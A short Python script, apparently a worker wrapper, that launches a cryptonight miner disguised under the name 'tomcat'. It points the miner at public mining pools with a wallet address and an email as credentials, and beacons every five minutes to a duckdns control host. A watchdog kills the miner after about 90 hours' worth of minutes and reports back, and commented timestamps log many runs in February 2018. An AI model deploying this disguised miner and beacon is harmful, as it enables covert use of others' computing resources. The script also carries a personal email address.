import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:21:04.370285
#2018-02-17 16:08:05.398144
#2018-02-17 17:57:01.393883
#2018-02-17 19:44:02.221053
#2018-02-17 21:31:05.437271
#2018-02-17 23:15:03.742520
#2018-02-18 01:01:06.761749
#2018-02-18 02:49:01.524101
#2018-02-18 04:39:02.027592
#2018-02-18 06:31:05.534397
#2018-02-18 08:19:06.824393
#2018-02-18 10:07:06.777961
#2018-02-18 11:53:06.147736
#2018-02-18 13:38:05.362881
#2018-02-18 15:28:06.213440
#2018-02-18 17:17:05.717125
#2018-02-18 19:06:05.728532
#2018-02-18 20:52:01.640747
#2018-02-18 22:37:01.504000
#2018-02-19 00:26:04.890972
#2018-02-19 02:11:01.280064
#2018-02-19 03:58:01.716255
#2018-02-19 05:42:06.036186
#2018-02-19 07:29:07.079881
#2018-02-19 09:19:04.433517
#2018-02-19 11:08:04.679590
#2018-02-19 12:55:05.640830
#2018-02-19 14:42:06.435949
#2018-02-19 16:31:06.007366
#2018-02-19 18:17:01.928279
#2018-02-19 20:03:06.129531
#2018-02-19 21:52:07.332234
#2018-02-19 23:40:04.682534
#2018-02-20 01:27:05.460983
#2018-02-20 03:17:07.360656
#2018-02-20 05:05:03.942680
#2018-02-20 06:48:06.911245
#2018-02-20 08:35:06.345064
#2018-02-20 10:19:04.237430
#2018-02-20 12:04:07.483143
#2018-02-20 13:52:06.141143
#2018-02-20 15:32:05.930124
#2018-02-20 17:18:02.213529
#2018-02-20 19:07:07.362901
#2018-02-20 20:57:07.393825
#2018-02-20 22:43:07.568782
#2018-02-21 00:25:07.260167
#2018-02-21 02:13:06.381160
#2018-02-21 03:59:07.177497
#2018-02-21 05:46:06.567140
#2018-02-21 07:32:04.331623
#2018-02-21 09:16:05.685709
#2018-02-21 11:06:09.142265
#2018-02-21 12:55:10.368432
#2018-02-21 14:42:06.766518
#2018-02-21 16:29:06.983982
#2018-02-21 18:20:10.492122
#2018-02-21 20:07:03.741037
#2018-02-21 21:54:01.308993
#2018-02-21 23:42:01.391985
#2018-02-22 01:31:06.687411
#2018-02-22 03:19:01.345540
#2018-02-22 05:06:09.057520
#2018-02-22 06:48:06.802824
#2018-02-22 08:37:01.882871
#2018-02-22 10:24:01.642747
#2018-02-22 12:09:04.535060
#2018-02-22 13:55:01.394766
#2018-02-22 15:43:14.283391
#2018-02-22 17:32:05.138851
#2018-02-22 19:18:07.304040
#2018-02-22 21:09:04.589577
#2018-02-22 22:55:07.189197
#2018-02-23 00:43:07.175123
#2018-02-23 02:32:07.407784
#2018-02-23 04:20:04.156682
#2018-02-23 06:05:05.710761
#2018-02-23 07:50:01.389038
#2018-02-23 09:51:08.448242
#2018-02-23 11:55:08.956127
#2018-02-23 13:44:09.270157
#2018-02-23 15:32:06.574974
#2018-02-23 17:20:08.442338
#2018-02-23 19:05:07.737032
#2018-02-23 20:52:01.238531
#2018-02-23 22:37:05.007821
#2018-02-24 00:23:06.503544
#2018-02-24 02:15:08.995025
#2018-02-24 04:04:04.818735
#2018-02-24 05:52:07.448903
#2018-02-24 07:41:07.289742
#2018-02-24 09:26:04.335404
#2018-02-24 11:19:05.070761
#2018-02-24 13:09:02.066357
#2018-02-24 14:59:04.015104
#2018-02-24 16:49:05.014772
#2018-02-24 18:38:01.483946
#2018-02-24 20:29:05.304162
#2018-02-24 22:25:08.143450
#2018-02-25 01:33:06.970633
#2018-02-25 04:29:02.230955
#2018-02-25 08:00:10.471323